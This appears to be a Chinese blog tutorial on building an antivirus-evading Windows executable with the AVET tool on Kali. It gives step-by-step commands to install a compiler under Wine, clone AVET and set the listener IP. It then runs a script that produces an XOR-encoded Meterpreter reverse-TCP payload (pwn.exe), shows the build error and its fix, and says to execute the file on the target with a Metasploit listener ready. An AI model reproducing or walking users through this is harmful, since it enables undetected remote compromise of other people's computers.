資源：https://github.com/govolution/avet

1、在kali上下載：https://sourceforge.net/projects/tdm-gcc/

root@kali:/tmp# wget -c --no-check-certificate https://nchc.dl.sourceforge.net/project/tdm-gcc/TDM-GCC%20Installer/tdm64-gcc-5.1.0-2.exe

2、安裝

root@kali:/tmp# wine tdm64-gcc-5.1.0-2.exe

接下來(lái)默認(rèn)選項(xiàng)，繼續(xù)安裝。

3、克隆需要的庫(kù)

root@kali:/tmp# git clone https://github.com/govolution/avet

4、開(kāi)始搞事情

root@kali:/tmp# cd avet/
root@kali:/tmp/avet# ls

win32就是指32位的，win64就是指64位的。一般情況，32位的比較保險(xiǎn)一些。但不排除意外。

root@kali:/tmp/avet/build# leafpad build_win64_meterpreter_rev_tcp_xor_fopen.sh 

lhost=192.168.111.130 #這個(gè)ip是你自己本機(jī)的ip，就是接受shell用的。

root@kali:/tmp/avet/build# cd ..

root@kali:/tmp/avet# ./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh

。。。然后報(bào)錯(cuò)了，有點(diǎn)懵：
No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of c file: 2339 bytes
./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh: line 6: ./make_avet: cannot execute binary file: Exec format error
avet.c: In function 'main':
avet.c:122:15: error: 'buf' undeclared (first use in this function)
   shellcode = buf;
               ^
avet.c:122:15: note: each undeclared identifier is reported only once for each function it appears in

————————————————
更新：2017年8月1日 09:35:40
有網(wǎng)友提到：

gcc -o make_avet make_avet.c

可以解決上面這個(gè)報(bào)錯(cuò)的問(wèn)題。
————————————————
接下來(lái)就是用msf開(kāi)啟監(jiān)聽(tīng)。在目標(biāo)執(zhí)行生成的那個(gè)exe文件，默認(rèn)名字叫做pwn.exe，這個(gè)文件殺毒測(cè)試以后，基本都通過(guò)了。

要是有大佬做成功了，請(qǐng)發(fā)表一下看法。
附上視頻講解：傳送門(mén)
更多資源：https://www.blackhat.com/asia-17/